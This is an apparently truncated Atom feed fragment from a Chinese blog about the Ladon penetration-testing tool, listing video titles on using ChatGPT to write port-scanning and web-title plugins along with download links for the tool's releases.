rel="noopener">https://github.com/k8gege/ChatLadon</a><br>【视频】ChatGPT编写Ladon渗透插件之端口扫描.rar<br>【视频】ChatGPT编写Ladon渗透插件之网页标题获取.rar</p><h3 id="工具下载"><a href="#工具下载" class="headerlink" title="工具下载"></a>工具下载</h3><p>最新版本:<a href="https://k8gege.org/Download">https://k8gege.org/Download</a><br>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a></p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<h1 id="【视频】ChatGPT编写Ladon渗透插件之端口扫描-rar【视频】ChatGPT编写Ladon渗透插件之网页标题获取-rar"><a href="#【视频】ChatGPT编写Ladon渗透插件之端口扫描-rar【视频】ChatGPT编写Ladon渗透插件之网页
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Ladon" scheme="http://k8gege.org/tags/Ladon/"/>
</entry>
</feed>